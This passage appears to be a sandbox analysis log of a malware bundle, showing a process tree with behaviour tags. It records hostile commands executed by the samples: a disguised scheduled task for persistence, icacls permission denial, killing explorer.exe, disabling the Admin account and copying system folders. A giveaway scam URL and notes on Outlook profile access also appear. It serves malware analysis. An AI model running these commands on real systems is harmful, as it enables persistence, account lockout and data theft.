- Modifies data under HKEY_USERS
- Modifies system certificate store
PID:5884
-
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\f3cb220f1aaa32ca310586e5f62dcab1.exef3cb220f1aaa32ca310586e5f62dcab1.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:6740 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:6532 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc435a46f8,0x7ffc435a4708,0x7ffc435a47185⤵PID:6836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:25⤵PID:6244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:6012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:85⤵PID:3144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:15⤵PID:2952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:15⤵PID:792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:15⤵PID:5536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:15⤵PID:2652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:15⤵PID:4016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:15⤵PID:944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6248 /prefetch:85⤵PID:6396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6248 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:5084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:15⤵PID:6860
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video4⤵PID:6092
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc435a46f8,0x7ffc435a4708,0x7ffc435a47185⤵PID:5596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,12046222823570284283,11884039878247185374,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:25⤵PID:5388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,12046222823570284283,11884039878247185374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:6456
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/4⤵PID:4904
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc435a46f8,0x7ffc435a4708,0x7ffc435a47185⤵PID:1300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,11225495575981365362,3006042698811299335,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:25⤵PID:4412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,11225495575981365362,3006042698811299335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:7164
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5760
-
-
C:\Windows\SysWOW64\xcopy.exexcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:5168
-
-
C:\Windows\SysWOW64\regedit.exeregedit3⤵
- System Location Discovery: System Language Discovery
- Runs regedit.exe
PID:6164
-
-
C:\Windows\SysWOW64\xcopy.exexcopy C:\Windows\WinSxS C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:6160
-
-
C:\Windows\SysWOW64\xcopy.exexcopy regmess.exe C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:4884
-
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\jaffa.exejaffa.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:4084 -
C:\Windows\SysWOW64\goqabvnnwp.exegoqabvnnwp.exe4⤵
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Windows security modification
- Enumerates connected drives
- Modifies WinLogon
- Drops file in System32 directory
- Modifies registry class
PID:5216 -
C:\Windows\SysWOW64\xwsrwnbm.exeC:\Windows\system32\xwsrwnbm.exe5⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3892
-
-
-
C:\Windows\SysWOW64\jzhwakyvvosbjmz.exejzhwakyvvosbjmz.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5352
-
-
C:\Windows\SysWOW64\xwsrwnbm.exexwsrwnbm.exe4⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
PID:924
-
-
C:\Windows\SysWOW64\hmhxytmhryech.exehmhxytmhryech.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1304
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\mydoc.rtf" /o ""4⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4176 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122885⤵PID:2648
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\helper.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\web3.htm3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:1788 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc435a46f8,0x7ffc435a4708,0x7ffc435a47184⤵PID:1688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:24⤵PID:7048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:34⤵PID:2224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:84⤵PID:4296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:14⤵PID:2416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:14⤵PID:2800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4260 /prefetch:14⤵PID:5512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:14⤵PID:4740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:14⤵PID:4400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:84⤵PID:2624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:84⤵PID:4124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4376 /prefetch:14⤵PID:5028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:14⤵PID:844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:14⤵PID:4848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:14⤵PID:6700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4184 /prefetch:24⤵PID:5100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:14⤵PID:3980
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\jkka.exejkka.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2220 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:5516 -
C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1364 -
C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:4412
-
-
C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe" 2 4412 2408282036⤵
- Executes dropped EXE
PID:5672
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fontdrvhost.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:7128
-
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\selfaware.exeselfaware.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6468 -
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\selfaware.exeselfaware.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:1684 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\a3a657da-b710-41f3-baf4-9fe218840fd0" /deny *S-1-1-0:(OI)(CI)(DE,DC)5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:6560
-
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\selfaware.exe"C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\selfaware.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5100 -
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\selfaware.exe"C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\selfaware.exe" --Admin IsNotAutoStart IsNotTask6⤵
- Checks computer location settings
- Executes dropped EXE
PID:3388 -
C:\Users\Admin\AppData\Local\666c0881-2566-4099-bf77-daa50b05f721\build3.exe"C:\Users\Admin\AppData\Local\666c0881-2566-4099-bf77-daa50b05f721\build3.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6888 -
C:\Users\Admin\AppData\Local\666c0881-2566-4099-bf77-daa50b05f721\build3.exe"C:\Users\Admin\AppData\Local\666c0881-2566-4099-bf77-daa50b05f721\build3.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1112 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"9⤵
- Scheduled Task/Job: Scheduled Task
PID:6516
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
PID:6488
-
-
C:\Windows\SysWOW64\net.exenet user Admin /active:no3⤵
- System Location Discovery: System Language Discovery
PID:7112 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Admin /active:no4⤵PID:6048
-
-
-
C:\Windows\SysWOW64\net.exenet user DefaultAccount /active:yes3⤵PID:1272
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user DefaultAccount /active:yes4⤵
- System Location Discovery: System Language Discovery
PID:7080
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mrbeast-giftcards-gaway.netlify.app/3⤵PID:5060
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xd8,0x100,0x104,0xe4,0x108,0x7ffc435a46f8,0x7ffc435a4708,0x7ffc435a47184⤵PID:1432
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy C:\Windows\Fonts C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2712
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:6108
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3600
-
C:\Windows\system32\efsui.exeefsui.exe /efs /keybackup1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2200
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5296
-
